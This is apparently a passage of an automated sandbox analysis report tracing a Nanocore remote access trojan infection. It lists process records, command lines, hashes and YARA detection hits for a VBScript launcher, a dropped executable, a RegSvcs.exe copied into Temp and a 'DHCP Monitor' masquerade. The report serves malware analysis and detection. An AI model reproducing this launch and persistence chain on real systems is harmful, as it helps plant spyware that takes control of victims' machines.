              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:20
              Start time:17:52:15
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:21
              Start time:17:52:16
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:22
              Start time:17:52:18
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x350000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:23
              Start time:17:52:23
              Start date:03/02/2023
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
              Imagebase:0xb80000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:24
              Start time:17:52:23
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:25
              Start time:17:52:28
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xa50000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:26
              Start time:17:52:33
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:27
              Start time:17:52:41
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:28
              Start time:17:52:44
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x950000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:29
              Start time:17:52:44
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:32
              Start time:17:52:55
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xf30000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:33
              Start time:17:52:56
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:34
              Start time:17:53:05
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:35
              Start time:17:53:06
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
